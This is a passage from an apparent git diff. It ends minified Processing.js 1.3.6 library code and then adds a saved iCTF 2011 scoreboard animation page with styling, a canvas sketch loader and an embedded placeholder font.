bo=bq.name,bw=bu+"."+bo;var bp="if("+bw+" === void(0)) {\n "+bw+" = "+bq.value+"; }\n$p.defineProperty("+bv+", '"+bo+"', { get: function(){return "+bw+";}, set: function(val){"+bw+" = val;} });\n";bs.push(bp)}return bs.join("")}return bv+"."+this.definitions.join("; "+bv+".")};function bd(bt){var bs=U.exec(bt);var bo=bs[1].indexOf("static")>=0;var br=bt.substring(bs[0].length).split(/,\s*/g);var bp=aR(bs[2]);for(var bq=0;bq<br.length;++bq){br[bq]=ai(br[bq],bp)}return new ak(br,bs[2],bo)}function aL(bp,bo){this.params=bp;this.body=bo}aL.prototype.toString=function(){var br=at({},this.params.getNames());var bp=aj;aj=function(bs){return br.hasOwnProperty(bs.name)?bs.name:bp(bs)};var bq="function $constr_"+this.params.params.length+this.params.toString();var bo=this.body.toString();if(!/\$(superCstr|constr)\b/.test(bo)){bo="{\n$superCstr();\n"+bo.substring(1)}aj=bp;return bq+bo+"\n"};function aq(bq){var bo=(new RegExp(/"B(\d+)"\s*"A(\d+)"/)).exec(bq);var bp=aB(bi[bo[1]]);return new aL(bp,an(bi[bo[2]]))}function aM(bq,bt,bs,bo,bu,bv){var br,bp;this.name=bq;this.interfacesNames=bt;this.methodsNames=bs;this.fields=bo;this.innerClasses=bu;this.misc=bv;for(br=0,bp=bo.length;br<bp;++br){bo[br].owner=this}}aM.prototype.getMembers=function(bv,bo,bt){if(this.owner.base){this.owner.base.body.getMembers(bv,bo,bt)}var bs,br,bq,bp;for(bs=0,bq=this.fields.length;bs<bq;++bs){var bx=this.fields[bs].getNames();for(br=0,bp=bx.length;br<bp;++br){bv[bx[br]]=this.fields[bs]}}for(bs=0,bq=this.methodsNames.length;bs<bq;++bs){var bu=this.methodsNames[bs];bo[bu]=true}for(bs=0,bq=this.innerClasses.length;bs<bq;++bs){var bw=this.innerClasses[bs];bt[bw.name]=bw}};aM.prototype.toString=function(){function bp(bF){var bE=0;while(bF){++bE;bF=bF.scope}return bE}var by=bp(this.owner);var bz=this.name;var bv="";var bA="";var bC={},bx={},bw={};this.getMembers(bC,bx,bw);var bu,bs,bt,br;if(this.owner.interfaces){var bo=[],bq;for(bu=0,bs=this.interfacesNames.length;bu<bs;++bu){if(!this.owner.interfaces[bu]){continue}bq=aj({name:this.interfacesNames[bu]});bo.push(bq);bv+="$p.extendInterfaceMembers("+bz+", "+bq+");\n"}bA+=bz+".$interfaces = ["+bo.join(", ")+"];\n"}bA+=bz+".$isInterface = true;\n";bA+=bz+".$methods = ['"+this.methodsNames.join("', '")+"'];\n";a0(this.innerClasses);for(bu=0,bs=this.innerClasses.length;bu<bs;++bu){var bD=this.innerClasses[bu];if(bD.isStatic){bv+=bz+"."+bD.name+" = "+bD+";\n"}}for(bu=0,bs=this.fields.length;bu<bs;++bu){var bB=this.fields[bu];if(bB.isStatic){bv+=bz+"."+bB.definitions.join(";\n"+bz+".")+";\n"}}return"(function() {\nfunction "+bz+"() { throw 'Unable to create the interface'; }\n"+bv+bA+"return "+bz+";\n})()"};Q=function(bu,bp,bz){var bA=bu.substring(1,bu.length-1);bA=ac(bA);bA=bb(bA,bp);var bx=[],br=[];bA=bA.replace(/"([DE])(\d+)"/g,function(bD,bC,bB){if(bC==="D"){bx.push(bB)}else{if(bC==="E"){br.push(bB)}}return""});var bv=bA.split(/;(?:\s*;)*/g);var bs;var bt,bq;if(bz!==r){bs=bz.replace(/^\s*extends\s+(.+?)\s*$/g,"$1").split(/\s*,\s*/g)}for(bt=0,bq=bx.length;bt<bq;++bt){var bo=N(bi[bx[bt]]);bx[bt]=bo.name}for(bt=0,bq=bv.length-1;bt<bq;++bt){var by=aN(bv[bt]);bv[bt]=bd(by.middle)}var bw=bv.pop();for(bt=0,bq=br.length;bt<bq;++bt){br[bt]=R(bi[br[bt]])}return new aM(bp,bs,bx,bv,br,{tail:bw})};function az(bp,bw,bv,bu,bq,bx,by,bs,bo){var bt,br;this.name=bp;this.baseClassName=bw;this.interfacesNames=bv;this.functions=bu;this.methods=bq;this.fields=bx;this.cstrs=by;this.innerClasses=bs;this.misc=bo;for(bt=0,br=bx.length;bt<br;++bt){bx[bt].owner=this}}az.prototype.getMembers=function(bv,bp,bu){if(this.owner.base){this.owner.base.body.getMembers(bv,bp,bu)}var bt,bs,br,bq;for(bt=0,br=this.fields.length;bt<br;++bt){var bx=this.fields[bt].getNames();for(bs=0,bq=bx.length;bs<bq;++bs){bv[bx[bs]]=this.fields[bt]}}for(bt=0,br=this.methods.length;bt<br;++bt){var bo=this.methods[bt];bp[bo.name]=bo}for(bt=0,br=this.innerClasses.length;bt<br;++bt){var bw=this.innerClasses[bt];bu[bw.name]=bw}};az.prototype.toString=function(){function bJ(bR){var bQ=0;while(bR){++bQ;bR=bR.scope}return bQ}var bz=bJ(this.owner);var bC="$this_"+bz;var bq=this.name;var bv="var "+bC+" = this;\n";var bD="";var bx="";var bO={},bP={},bF={};this.getMembers(bO,bP,bF);var bN=aj;aj=function(bR){var bQ=bR.name;if(bQ==="this"){return bR.callSign||!bR.member?bC+".$self":bC}if(bO.hasOwnProperty(bQ)){return bO[bQ].isStatic?bq+"."+bQ:bC+"."+bQ}if(bF.hasOwnProperty(bQ)){return bC+"."+bQ}if(bP.hasOwnProperty(bQ)){return bP[bQ].isStatic?bq+"."+bQ:bC+".$self."+bQ}return bN(bR)};var by;if(this.baseClassName){by=bN({name:this.baseClassName});bv+="var $super = { $upcast: "+bC+" };\n";bv+="function $superCstr(){"+by+".apply($super,arguments);if(!('$self' in $super)) $p.extendClassChain($super)}\n";bx+=bq+".$base = "+by+";\n"}else{bv+="function $superCstr(){$p.extendClassChain("+bC+")}\n"}if(this.owner.base){bD+="$p.extendStaticMembers("+bq+", "+by+");\n"}var bI,bG,bH,bE;if(this.owner.interfaces){var bu=[],bo;for(bI=0,bG=this.interfacesNames.length;bI<bG;++bI){if(!this.owner.interfaces[bI]){continue}bo=bN({name:this.interfacesNames[bI]});bu.push(bo);bD+="$p.extendInterfaceMembers("+bq+", "+bo+");\n"}bx+=bq+".$interfaces = ["+bu.join(", ")+"];\n"}if(this.functions.length>0){bv+=this.functions.join("\n")+"\n"}a0(this.innerClasses);for(bI=0,bG=this.innerClasses.length;bI<bG;++bI){var bB=this.innerClasses[bI];if(bB.isStatic){bD+=bq+"."+bB.name+" = "+bB+";\n";bv+=bC+"."+bB.name+" = "+bq+"."+bB.name+";\n"}else{bv+=bC+"."+bB.name+" = "+bB+";\n"}}for(bI=0,bG=this.fields.length;bI<bG;++bI){var bp=this.fields[bI];if(bp.isStatic){bD+=bq+"."+bp.definitions.join(";\n"+bq+".")+";\n";for(bH=0,bE=bp.definitions.length;bH<bE;++bH){var bs=bp.definitions[bH].name,bw=bq+"."+bs;bv+="$p.defineProperty("+bC+", '"+bs+"', {get: function(){return "+bw+"}, set: function(val){"+bw+" = val}});\n"}}else{bv+=bC+"."+bp.definitions.join(";\n"+bC+".")+";\n"}}var bA={};for(bI=0,bG=this.methods.length;bI<bG;++bI){var br=this.methods[bI];var bL=bA[br.name];var bt=br.name+"$"+br.params.params.length;if(bL){++bL;bt+="_"+bL}else{bL=1}br.methodId=bt;bA[br.name]=bL;if(br.isStatic){bD+=br;bD+="$p.addMethod("+bq+", '"+br.name+"', "+bt+");\n";bv+="$p.addMethod("+bC+", '"+br.name+"', "+bt+");\n"}else{bv+=br;bv+="$p.addMethod("+bC+", '"+br.name+"', "+bt+");\n"}}bv+=a4(this.misc.tail);if(this.cstrs.length>0){bv+=this.cstrs.join("\n")+"\n"}bv+="function $constr() {\n";var bM=[];for(bI=0,bG=this.cstrs.length;bI<bG;++bI){var bK=this.cstrs[bI].params.params.length;bM.push("if(arguments.length === "+bK+") { $constr_"+bK+".apply("+bC+", arguments); }")}if(bM.length>0){bv+=bM.join(" else ")+" else "}bv+="$superCstr();\n}\n";bv+="$constr.apply(null, arguments);\n";aj=bN;return"(function() {\nfunction "+bq+"() {\n"+bv+"}\n"+bD+bx+"return "+bq+";\n})()"};T=function(bx,bp,bo,bA){var bC=bx.substring(1,bx.length-1);bC=ac(bC);bC=bb(bC,bp);var bq=[],br=[],bB=[],bu=[];bC=bC.replace(/"([DEGH])(\d+)"/g,function(bF,bE,bD){if(bE==="D"){bq.push(bD)}else{if(bE==="E"){br.push(bD)}else{if(bE==="H"){bu.push(bD)}else{bB.push(bD)}}}return""});var bw=bC.replace(/^(?:\s*;)+/,"").split(/;(?:\s*;)*/g);var bv,bt;var bs;if(bo!==r){bv=bo.replace(/^\s*extends\s+([A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)\s*$/g,"$1")}if(bA!==r){bt=bA.replace(/^\s*implements\s+(.+?)\s*$/g,"$1").split(/\s*,\s*/g)}for(bs=0;bs<bu.length;++bs){bu[bs]=aI(bi[bu[bs]])}for(bs=0;bs<bq.length;++bs){bq[bs]=N(bi[bq[bs]])}for(bs=0;bs<bw.length-1;++bs){var bz=aN(bw[bs]);bw[bs]=bd(bz.middle)}var by=bw.pop();for(bs=0;bs<bB.length;++bs){bB[bs]=aq(bi[bB[bs]])}for(bs=0;bs<br.length;++bs){br[bs]=R(bi[br[bs]])}return new az(bp,bv,bt,bu,bq,bw,bB,br,{tail:by})};function au(bp,bo){this.name=bp;this.body=bo;bo.owner=this}au.prototype.toString=function(){return"var "+this.name+" = "+this.body+";\n$p."+this.name+" = "+this.name+";\n"};function a3(bp,bo){this.name=bp;this.body=bo;bo.owner=this}a3.prototype.toString=function(){return"var "+this.name+" = "+this.body+";\n$p."+this.name+" = "+this.name+";\n"};function bm(bq){var bp=M.exec(bq);M.lastIndex=0;var bo=bi[aO(bp[6])];var bt=a7,br=a5();a7=br;var bs;if(bp[2]==="interface"){bs=new au(bp[3],Q(bo,bp[3],bp[4]))}else{bs=new a3(bp[3],T(bo,bp[3],bp[4],bp[5]))}bj(bs,br,bt);a7=bt;return bs}function aP(bp,bq,bo){this.name=bp;this.params=bq;this.body=bo}aP.prototype.toString=function(){var bq=at({},this.params.getNames());var bp=aj;aj=function(br){return bq.hasOwnProperty(br.name)?br.name:bp(br)};var bo="function "+this.name+this.params+" "+this.body+"\n$p."+this.name+" = "+this.name+";";aj=bp;return bo};function aU(bq){var bp=a9.exec(bq);var bo=a9.lastIndex=0;return new aP(bp[3],aB(bi[aO(bp[4])]),an(bi[aO(bp[6])]))}function ae(bo){var bp=bo;bp=bp.replace(/\b(catch\s*"B\d+"\s*"A\d+")(\s*catch\s*"B\d+"\s*"A\d+")+/g,"$1");return bp}function aS(bo,bp){this.argument=bo;this.misc=bp}aS.prototype.toString=function(){return this.misc.prefix+this.argument.toString()};function O(bo,bp){this.argument=bo;this.misc=bp}O.prototype.toString=function(){return this.misc.prefix+this.argument.toString()};function av(bo,bp,bq){this.name=bo;this.argument=bp;this.misc=bq}av.prototype.toString=function(){var bo=this.misc.prefix;if(this.argument!==r){bo+=this.argument.toString()}return bo};function aJ(bo){this.expr=bo}aJ.prototype.toString=function(){return"case "+this.expr+":"};function V(bo){this.label=bo}V.prototype.toString=function(){return this.label};aT=function(bw,bx,bq){var bB=new RegExp(/\b(catch|for|if|switch|while|with)\s*"B(\d+)"|\b(do|else|finally|return|throw|try|break|continue)\b|("[ADEH](\d+)")|\b(case)\s+([^:]+):|\b([A-Za-z_$][\w$]*\s*:)|(;)/g);var by=[];bw=ae(bw);var bv=0,br,bp;while((br=bB.exec(bw))!==null){if(br[1]!==r){var bu=bw.lastIndexOf('"B',bB.lastIndex);var bA=bw.substring(bv,bu);if(br[1]==="for"){by.push(new aS(W(bi[br[2]]),{prefix:bA}))}else{if(br[1]==="catch"){by.push(new O(aB(bi[br[2]]),{prefix:bA}))}else{by.push(new av(br[1],aX(bi[br[2]]),{prefix:bA}))}}}else{if(br[3]!==r){by.push(new av(br[3],r,{prefix:bw.substring(bv,bB.lastIndex)}))}else{if(br[4]!==r){bp=bw.substring(bv,bB.lastIndex-br[4].length);if(a4(bp).length!==0){continue}by.push(bp);var bs=br[4].charAt(1),bo=br[5];if(bs==="D"){by.push(bx(bi[bo]))}else{if(bs==="E"){by.push(bq(bi[bo]))}else{if(bs==="H"){by.push(aI(bi[bo]))}else{by.push(an(bi[bo]))}}}}else{if(br[6]!==r){by.push(new aJ(aX(a4(br[7]))))}else{if(br[8]!==r){bp=bw.substring(bv,bB.lastIndex-br[8].length);if(a4(bp).length!==0){continue}by.push(new V(bw.substring(bv,bB.lastIndex)))}else{var bz=aN(bw.substring(bv,bB.lastIndex-1));by.push(bz.left);by.push(bl(bz.middle));by.push(bz.right+";")}}}}}bv=bB.lastIndex}var bt=aN(bw.substring(bv));by.push(bt.left);if(bt.middle!==""){by.push(bl(bt.middle));by.push(";"+bt.right)}return by};function bc(bp){var bq=[];for(var br=0,bo=bp.length;br<bo;++br){var bs=bp[br];if(bs instanceof aG){bq=bq.concat(bs.getNames())}else{if(bs instanceof aS&&bs.argument.initStatement instanceof aG){bq=bq.concat(bs.argument.initStatement.getNames())}else{if(bs instanceof Z||bs instanceof al||bs instanceof au||bs instanceof a3||bs instanceof aP||bs instanceof ad){bq.push(bs.name)}}}}return at({},bq)}function S(bo){this.statements=bo}S.prototype.toString=function(){var bq=bc(this.statements);var bp=aj;if(!a8(bq)){aj=function(br){return bq.hasOwnProperty(br.name)?br.name:bp(br)}}var bo="{\n"+this.statements.join("")+"\n}";aj=bp;return bo};an=function(bp){var bo=aN(bp.substring(1,bp.length-1));return new S(aT(bo.middle))};function aE(bo){this.statements=bo}aE.prototype.toString=function(){var bs=[],bt=[],bu;for(var br=0,bp=this.statements.length;br<bp;++br){bu=this.statements[br];if(bu instanceof a3||bu instanceof au){bs.push(bu)}else{bt.push(bu)}}a0(bs);var bq=bc(this.statements);aj=function(bw){var bv=bw.name;if(bq.hasOwnProperty(bv)){return bv}if(aV.hasOwnProperty(bv)||z.hasOwnProperty(bv)||g.hasOwnProperty(bv)){return"$p."+bv}return bv};var bo="// this code was autogenerated from PJS\n(function($p) {\n"+bs.join("")+"\n"+bt.join("")+"\n})";aj=null;return bo};bg=function(){var bo=ac(bi[0]);bo=bo.replace(/\bimport\s+[^;]+;/g,"");return new aE(aT(bo,aU,bm))};function bh(bo){var bs={};var bq,bw;for(bq in aH){if(aH.hasOwnProperty(bq)){bw=aH[bq];var bC=bw.scopeId,bp=bw.name;if(bC){var bB=aH[bC];bw.scope=bB;if(bB.inScope===r){bB.inScope={}}bB.inScope[bp]=bw}else{bs[bp]=bw}}}function bz(bD,bG){var bJ=bG.split(".");var bF=bD.scope,bI;while(bF){if(bF.hasOwnProperty(bJ[0])){bI=bF[bJ[0]];break}bF=bF.scope}if(bI===r){bI=bs[bJ[0]]}for(var bH=1,bE=bJ.length;bH<bE&&bI;++bH){bI=bI.inScope[bJ[bH]]}return bI}for(bq in aH){if(aH.hasOwnProperty(bq)){bw=aH[bq];var bv=bw.body.baseClassName;if(bv){var by=bz(bw,bv);if(by){bw.base=by;if(!by.derived){by.derived=[]}by.derived.push(bw)}}var bu=bw.body.interfacesNames,bA=[],bt,br;if(bu&&bu.length>0){for(bt=0,br=bu.length;bt<br;++bt){var bx=bz(bw,bu[bt]);bA.push(bx);if(!bx){continue}if(!bx.derived){bx.derived=[]}bx.derived.push(bw)}if(bA.length>0){bw.interfaces=bA}}}}}function a6(bo){var bt=[],bq={};var bp,bw,bu;for(bp in aH){if(aH.hasOwnProperty(bp)){bu=aH[bp];if(!bu.inScope&&!bu.derived){bt.push(bp);bu.weight=0}else{var bv=[];if(bu.inScope){for(bw in bu.inScope){if(bu.inScope.hasOwnProperty(bw)){bv.push(bu.inScope[bw])}}}if(bu.derived){bv=bv.concat(bu.derived)}bq[bp]=bv}}}function bx(bz,bB){var by=bq[bz];if(!by){return false}var bA=by.indexOf(bB);if(bA<0){return false}by.splice(bA,1);if(by.length>0){return false}delete bq[bz];return true}while(bt.length>0){bp=bt.shift();bu=aH[bp];if(bu.scopeId&&bx(bu.scopeId,bu)){bt.push(bu.scopeId);aH[bu.scopeId].weight=bu.weight+1}if(bu.base&&bx(bu.base.classId,bu)){bt.push(bu.base.classId);bu.base.weight=bu.weight+1}if(bu.interfaces){var bs,br;for(bs=0,br=bu.interfaces.length;bs<br;++bs){if(!bu.interfaces[bs]||!bx(bu.interfaces[bs].classId,bu)){continue}bt.push(bu.interfaces[bs].classId);bu.interfaces[bs].weight=bu.weight+1}}}}var bf=bg();bh(bf);a6(bf);var aY=bf.toString();aY=aY.replace(/\s*\n(?:[\t ]*\n)+/g,"\n\n");return ah(aY,L)}function x(M,ab){var V=(new RegExp(/\/\*\s*@pjs\s+((?:[^\*]|\*+[^\*\/])*)\*\//g)).exec(M);if(V&&V.length===2){var L=[],O=V.splice(1,2)[0].replace(/\{([\s\S]*?)\}/g,function(){return function(ae,af){L.push(af);return"{"+(L.length-1)+"}"}}()).replace("\n","").replace("\r","").split(";");var U=function(ae){return ae.replace(/^\s*["']?/,"").replace(/["']?\s*$/,"")};for(var Y=0,W=O.length;Y<W;Y++){var S=O[Y].split("=");if(S&&S.length===2){var ad=U(S[0]),T=U(S[1]),ac=[];if(ad==="preload"){ac=T.split(",");for(var X=0,Z=ac.length;X<Z;X++){var aa=U(ac[X]);ab.imageCache.add(aa)}}else{if(ad==="font"){ac=T.split(",");for(var P=0,R=ac.length;P<R;P++){var Q=U(ac[P]),N=/^\{(\d*?)\}$/.exec(Q);F.preloading.add(N?JSON.parse("{"+L[N[1]]+"}"):Q)}}else{if(ad==="pauseOnBlur"){ab.options.pauseOnBlur=T==="true"}else{if(ad==="globalKeyEvents"){ab.options.globalKeyEvents=T==="true"}else{if(ad.substring(0,6)==="param-"){ab.params[ad.substring(6)]=T}else{ab.options[ad]=T}}}}}}}}return M}D.compile=function(L){var O=new D.Sketch;var M=x(L,O);var N=c(M);O.sourceCode=N;return O};var j=function(){var R={},O="undefined",P="function",L=!1,Q=!0,M=512,N="log";if(typeof tinylog!==O&&typeof tinylog[N]===P){R[N]=tinylog[N]}else{if(typeof d!==O&&!d.fake){(function(){var am=d,ak="div",aa="style",ae="title",Z={zIndex:10000,position:"fixed",bottom:"0px",width:"100%",height:"15%",fontFamily:"sans-serif",color:"#ccc",backgroundColor:"black"},ac={position:"relative",fontFamily:"monospace",overflow:"auto",height:"100%",paddingTop:"5px"},ag={height:"5px",marginTop:"-5px",cursor:"n-resize",backgroundColor:"darkgrey"},al={position:"absolute",top:"5px",right:"20px",color:"#111",MozBorderRadius:"4px",webkitBorderRadius:"4px",borderRadius:"4px",cursor:"pointer",fontWeight:"normal",textAlign:"center",padding:"3px 5px",backgroundColor:"#333",fontSize:"12px"},W={minHeight:"16px"},ad={fontSize:"12px",margin:"0 8px 0 8px",maxWidth:"100%",whiteSpace:"pre-wrap",overflow:"auto"},ab=am.defaultView,aj=am.documentElement,S=aj[aa],U=function(){var ao=arguments.length,an,aq,ap;while(ao--){aq=arguments[ao--];an=arguments[ao][aa];for(ap in aq){if(aq.hasOwnProperty(ap)){an[ap]=aq[ap]}}}},ah=function(ap,ao,an){if(ap.addEventListener){ap.addEventListener(ao,an,L)}else{if(ap.attachEvent){ap.attachEvent("on"+ao,an)}}return[ap,ao,an]},T=function(ap,ao,an){if(ap.removeEventListener){ap.removeEventListener(ao,an,L)}else{if(ap.detachEvent){ap.detachEvent("on"+ao,an)}}},Y=function(ao){var an=ao.childNodes,ap=an.length;while(ap--){ao.removeChild(an.item(0))}},ai=function(ao,an){return ao.appendChild(an)},af=function(an){return am.createElement(an)},X=function(an){return am.createTextNode(an)},V=R[N]=function(aC){var au,av=S.paddingBottom,ap=af(ak),az=ap[aa],aA=ai(ap,af(ak)),ar=ai(ap,af(ak)),aq=ai(ap,af(ak)),aB=L,at=L,ao=L,aw=0,an=function(){S.paddingBottom=ap.clientHeight+"px"},ay=function(aD){var aE=ab.innerHeight,aF=aA.clientHeight;if(aD<0){aD=0}else{if(aD+aF>aE){aD=aE-aF}}az.height=aD/aE*100+"%";an()},ax=[ah(am,"mousemove",function(aD){if(aB){ay(ab.innerHeight-aD.clientY);ar.scrollTop=ao}}),ah(am,"mouseup",function(){if(aB){aB=ao=L}}),ah(aA,"dblclick",function(aD){aD.preventDefault();if(at){ay(at);at=L}else{at=ap.clientHeight;az.height="0px"}}),ah(aA,"mousedown",function(aD){aD.preventDefault();aB=Q;ao=ar.scrollTop}),ah(aA,"contextmenu",function(){aB=L}),ah(aq,"click",function(){au()})];au=function(){var aD=ax.length;while(aD--){T.apply(R,ax[aD])}aj.removeChild(ap);S.paddingBottom=av;Y(ar);Y(ap);R[N]=V};U(ap,Z,ar,ac,aA,ag,aq,al);aq[ae]="Close Log";ai(aq,X("\u2716"));aA[ae]="Double-click to toggle log minimization";aj.insertBefore(ap,aj.firstChild);R[N]=function(aF){if(aw===M){ar.removeChild(ar.firstChild)}else{aw++}var aE=ai(ar,af(ak)),aD=ai(aE,af(ak));aE[ae]=(new Date).toLocaleTimeString();U(aE,W,aD,ad);ai(aD,X(aF));ar.scrollTop=ar.scrollHeight};R[N](aC);an()}})()}else{if(typeof print===P){R[N]=print}}}return R}();D.logger=j;D.version="1.3.6";D.lib={};D.registerLibrary=function(L,M){D.lib[L]=M;if(M.hasOwnProperty("init")){M.init(g)}};D.instances=k;D.getInstanceById=function(L){return k[H[L]]};D.Sketch=function(L){this.attachFunction=L;this.options={pauseOnBlur:false,globalKeyEvents:false};this.onLoad=E;this.onSetup=E;this.onPause=E;this.onLoop=E;this.onFrameStart=E;this.onFrameEnd=E;this.onExit=E;this.params={};this.imageCache={pending:0,images:{},operaCache:{},add:function(N,M){if(this.images[N]){return}if(!l){this.images[N]=null}if(!M){M=new Image;M.onload=function(P){return function(){P.pending--}}(this);this.pending++;M.src=N}this.images[N]=M;if(B.opera){var O=d.createElement("div");O.appendChild(M);O.style.position="absolute";O.style.opacity=0;O.style.width="1px";O.style.height="1px";if(!this.operaCache[N]){d.body.appendChild(O);this.operaCache[N]=O}}}};this.sourceCode=undefined;this.attach=function(N){if(typeof this.attachFunction==="function"){this.attachFunction(N)}else{if(this.sourceCode){var M=(new Function("return ("+this.sourceCode+");"))();M(N);this.attachFunction=M}else{throw"Unable to attach sketch to the processing instance"}}};this.toString=function(){var M;var N="((function(Sketch) {\n";N+="var sketch = new Sketch(\n"+this.sourceCode+");\n";for(M in this.options){if(this.options.hasOwnProperty(M)){var O=this.options[M];N+="sketch.options."+M+" = "+(typeof O==="string"?'"'+O+'"':""+O)+";\n"}}for(M in this.imageCache){if(this.options.hasOwnProperty(M)){N+='sketch.imageCache.add("'+M+'");\n'}}N+="return sketch;\n})(Processing.Sketch))";return N}};var t=function(O,L){var M=[],S=[],T=L.length,Q=0;function R(U,W){var V=new XMLHttpRequest;V.onreadystatechange=function(){if(V.readyState===4){var X;if(V.status!==200&&V.status!==0){X="Invalid XHR status "+V.status}else{if(V.responseText===""){if("withCredentials" in new XMLHttpRequest&&(new XMLHttpRequest).withCredentials===false&&B.location.protocol==="file:"){X="XMLHttpRequest failure, possibly due to a same-origin policy violation. You can try loading this page in another browser, or load it from http://localhost using a local webserver. See the Processing.js README for a more detailed explanation of this problem and solutions."}else{X="File is empty."}}}W(V.responseText,X)}};V.open("GET",U,true);if(V.overrideMimeType){V.overrideMimeType("application/json")}V.setRequestHeader("If-Modified-Since","Fri, 01 Jan 1960 00:00:00 GMT");V.send(null)}function N(V,U){function X(aa,Y){M[V]=aa;++Q;if(Y){S.push(U+" ==> "+Y)}if(Q===T){if(S.length===0){try{return new D(O,M.join("\n"))}catch(Z){throw"Processing.js: Unable to execute pjs sketch: "+Z}}else{throw"Processing.js: Unable to load pjs sketch files: "+S.join("\n")}}}if(U.charAt(0)==="#"){var W=d.getElementById(U.substring(1));if(W){X(W.text||W.textContent)}else{X("","Unable to load pjs sketch: element with id '"+U.substring(1)+"' was not found")}return}R(U,X)}for(var P=0;P<T;++P){N(P,L[P])}};var G=function(){d.removeEventListener("DOMContentLoaded",G,false);var M=d.getElementsByTagName("canvas"),S;for(var R=0,N=M.length;R<N;R++){var U=M[R].getAttribute("data-processing-sources");if(U===null){U=M[R].getAttribute("data-src");if(U===null){U=M[R].getAttribute("datasrc")}}if(U){S=U.split(" ");for(var Q=0;Q<S.length;){if(S[Q]){Q++}else{S.splice(Q,1)}}t(M[R],S)}}var O=d.getElementsByTagName("script");var Y,L,X;for(Y=0;Y<O.length;Y++){var W=O[Y];if(!W.getAttribute){continue}var V=W.getAttribute("type");if(V&&(V.toLowerCase()==="text/processing"||V.toLowerCase()==="application/processing")){var T=W.getAttribute("data-processing-target");M=r;if(T){M=d.getElementById(T)}else{var P=W.nextSibling;while(P&&P.nodeType!==1){P=P.nextSibling}if(P.nodeName.toLowerCase()==="canvas"){M=P}}if(M){if(W.getAttribute("src")){S=W.getAttribute("src").split(/\s+/);t(M,S);continue}L=W.textContent||W.text;X=new D(M,L)}}}};D.loadSketchFromSources=t;D.disableInit=function(){if(l){d.removeEventListener("DOMContentLoaded",G,false)}};if(l){B.Processing=D;d.addEventListener("DOMContentLoaded",G,false)}else{this.Processing=D}})(window,window.document,Math); diff --git a/ictf2011/scoreboard.ictf2011.info_files/ru.png b/ictf2011/scoreboard.ictf2011.info_files/ru.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011.info_files/score-anim.html b/ictf2011/scoreboard.ictf2011.info_files/score-anim.html @@ -0,0 +1,109 @@ +<!DOCTYPE html> +<!-- saved from url=(0047)http://scoreboard.ictf2011.info/score-anim.html --> +<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> + +<title>iCTF 2011 Laundering Scene</title> + +<style type="text/css"> +body {background-color:#131a22; +font-family:monospace; +} +</style> +<script type="text/javascript" src="jquery.min.js"></script> +<script language="javascript" src="processing-1.3.6.min.js"></script> +<!-- <script language="javascript" src="js/processing-1.3.6.min.js"></script> --> +<script type="text/javascript"> + +function UpdateList() +{ +} +$(document).ready(function() +{ + UpdateList() + setInterval("UpdateList()", 11000); +}); + +</script> + +<style type="text/css"> +.score-anim-table +{ + + color:#7494D6; + font-family:arial; + font-size: 12pt; + width: 100%; + text-align: left; + background-color:#3E5490; + border-collapse: collapse; + + -moz-border-radius-bottomright: 15px; + border-bottom-right-radius: 15px; + -moz-border-radius-bottomleft: 15px; + border-bottom-left-radius: 15px; + -moz-border-radius-topright: 15px; + border-top-right-radius: 15px; + -moz-border-radius-topleft: 15px; + border-top-left-radius: 15px; + + filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#3E5482', endColorstr='#131A22'); + background-image: -webkit-linear-gradient(top , #3E5482, #131A22); + + background-image: -moz-linear-gradient(top, #3E5482, #131A22); +} + +.score-anim +{ + + margin-left:auto; + margin-right:auto; + +} +.tworldmap +{ + position:relative; +} +.bg-world{ + width: 100%; + height: 100%; + position: absolute; + top: 0; + left: 0; + z-index:0; + opacity: 0.9; +} +.bg-world-can +{ + position: relative; + top: 0; + left: 0; + z-index:500; +} +</style> + +<style type="text/css">@font-face { + font-family: "PjsEmptyFont"; + src: url('data:application/x-font-ttf;base64,AAEAAAAKAIAAAwAgT1MvMgAAAAAAAAEoAAAAVmNtYXAAAAAAAAABiAAAACxnbHlmAAAAAAAAAbwAAAAkaGVhZAAAAAAAAACsAAAAOGhoZWEAAAAAAAAA5AAAACRobXR4AAAAAAAAAYAAAAAGbG9jYQAAAAAAAAG0AAAABm1heHAAAAAAAAABCAAAACBuYW1lAAAAAAAAAeAAAAAgcG9zdAAAAAAAAAIAAAAAEAABAAAAAQAAAkgTY18PPPUACwAgAAAAALSRooAAAAAAyld0xgAAAAAAAQABAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAEAAAACAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACMAIwAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAMAAQAAAAwABAAgAAAABAAEAAEAAABB//8AAABB////wAABAAAAAAAAAAgAEgAAAAEAAAAAAAAAAAAAAAAxAAABAAAAAAABAAEAAQAAMTcBAQAAAAAAAgAeAAMAAQQJAAEAAAAAAAMAAQQJAAIAAgAAAAAAAQAAAAAAAAAAAAAAAAAA') + format('truetype'); +}</style></head> + +<body> +<div class="score-anim"> +<table class="score-anim-table"> +<tbody><tr> +<td style="{min-width:15px;}" width="50%"></td> +<td class="tworldmap"> + +<div class="bg-world-can"> +<canvas data-processing-sources="score-anim.pde" tabindex="0" id="__processing0" width="665" height="400" style="image-rendering: -webkit-optimize-contrast !important; "></canvas> +</div> +<img id="id-bg-world" class="bg-world" src="world.svg"> + +</td> +<td width="50%" "=""></td> +</tr> +</tbody></table> +</div> + + +<span style="position: absolute; top: 0px; left: 0px; opacity: 0; font-family: PjsEmptyFont, fantasy; ">AAAAAAAA</span></body><style type="text/css" style="display: none !important; ">/*This block of style rules is inserted by AdBlock*/#FFN_Banner_Holder,#FFN_imBox_Container,#RadAd_Skyscraper,#ab_pointer,#adxLeaderboard,#bbccom_leaderboard,#center_banner,#dir_ads_site,#flashad,#footer_adcode,#hbBHeaderSpon,#hiddenHeaderSpon,#navbar_adcode,#p360-format-box,#rightAds,#rightcolumn_adcode,#rm_container,#tads table[align="center"][width="100%"],#tooltipbox[class^="itxt"],#top-advertising,#topMPU,#tracker_advertorial,#ve_threesixty_swf[name="ve_threesixty_swf"],.ad-now,.ad_marquee,.dfpad,.kLink 